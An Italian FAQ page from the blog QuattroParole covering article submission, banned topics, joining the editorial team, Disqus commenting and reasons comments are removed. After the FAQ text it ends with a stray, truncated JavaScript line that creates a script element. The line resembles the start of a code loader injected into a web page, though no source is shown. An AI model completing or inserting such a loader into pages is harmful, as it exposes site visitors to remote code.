FAQ

Nel corso del suo primo anno e mezzo di vita, lo staff di QuattroParole ha ricevuto decine di richieste, domande, mail. Spesso abbiamo fatto il possibile per esaudirvi, spesso invece le richieste erano troppo anche per menti geniali come noi. Ma ci siamo accorti di una cosa: fondamentalmente, ci chiedete tutti le stesse cose. E noi (quando ci ricordiamo) rispondiamo sempre le stesse cose. Quindi tanto vale creare una pagina apposita come fanno i siti seri, ci siamo detti, no? Eccola.

Come faccio a scrivere un articolo su QuattroParole?

Nulla di più semplice. Puoi utilizzare la sezione Invia il tuo articolo, che trovi in cima al sito. Inserisci i tuoi dati e allega un documento Word o un PDF con il tuo articolo: noi ci occuperemo di adattarlo per il sito, aggiungere una foto di copertina e pubblicarlo a tuo nome. Se, invece, il tuo articolo contiene altre foto, documenti da scaricare, link a video di YouTube, ecc., forse ti conviene scrivere a redazione@quattroparole.com e inviarci direttamente tutto il materiale.

Di cosa posso parlare nel mio articolo?

Di tutto ciò che ti aggrada. Parla di ciò che ti piace di più: parla di una tua passione, recensisci un film o un libro che ti ha colpito, parla di un videogioco o una serie tv che ti ha particolarmente coinvolto. Oppure scrivi un articolo di sport, di tecnologia, di attualità, di spettacolo. Solo una cosa: gli argomenti vietati sono la politica e la pornografia (e le due cose insieme, visti i tempi che corrono), e cerca di mantenere un linguaggio quantomeno educato nel tuo articolo. Per il resto, sta tutto a te e a ciò che ti sta a cuore condividere con gli altri lettori di QuattroParole.

Come faccio a far parte della Redazione?

Bè, puoi scriverci, cliccando su Scrivici in cima al sito o mandando direttamente una mail a redazione@quattroparole.com, e dirci che vuoi collaborare con noi come Autore fisso. Ricordati però una cosa: qualunque sia l’argomento di cui vuoi parlare, o la rubrica che vuoi tenere, far parte della Redazione ti richiede un impegno minimo di un articolo a settimana. Se non pensi di poter garantire questo impegno, valuta l’opzione di inviarci solo qualche articolo ogni tanto (vedi sopra come fare). Altrimenti, ti chiederemo di inviarci un articolo di prova, e sarai il benvenuto.

Per commentare un articolo, devo essere per forza iscritto a Facebook?

Finalmente no. Con la nuova versione di QuattroParole siamo finalmente svincolati da Facebook e ci basiamo sulla diffusissima piattaforma Disqus.

Come mai il mio commento è stato cancellato/non è stato pubblicato?

Ci sono sei fondamentali motivi per cui un tuo commento non viene reso visibile su QuattroParole. 1) Hai usato parolacce e oscenità. Già, molti le scrivono senza nemmeno rendersene conto, ma è questo il principale motivo dell’oscuramento. Ah, sulle bestemmie siamo inflessibili: ne basta una, e non potrai commentare mai più. 2) Sei off-topic. Ossia stai commentando parlando di cose che non c’entrano nulla con l’argomento dell’articolo. 3) STAI SCRIVENDO TUTTO MAIUSCOLO! E’ una cosa che, nel linguaggio della Rete, è sbagliata. E noi non la tolleriamo. 4) Sei un troll riconosciuto e identificato, che commenta solo per infiammare le discussioni e mettere zizzania. 5) Sei completamente incoerente. 6) Sei un robot (o peggio, un utente vero) che prova a vendere Viagra, o pubblicizzare altri siti/prodotti/ecc… Il tuo commento è intelligente, coerente, simpatico, spiritoso, costruttivo? Tranquillo, non verrà mai cancellato.

var d=document;var s=d.createElement(‘script’);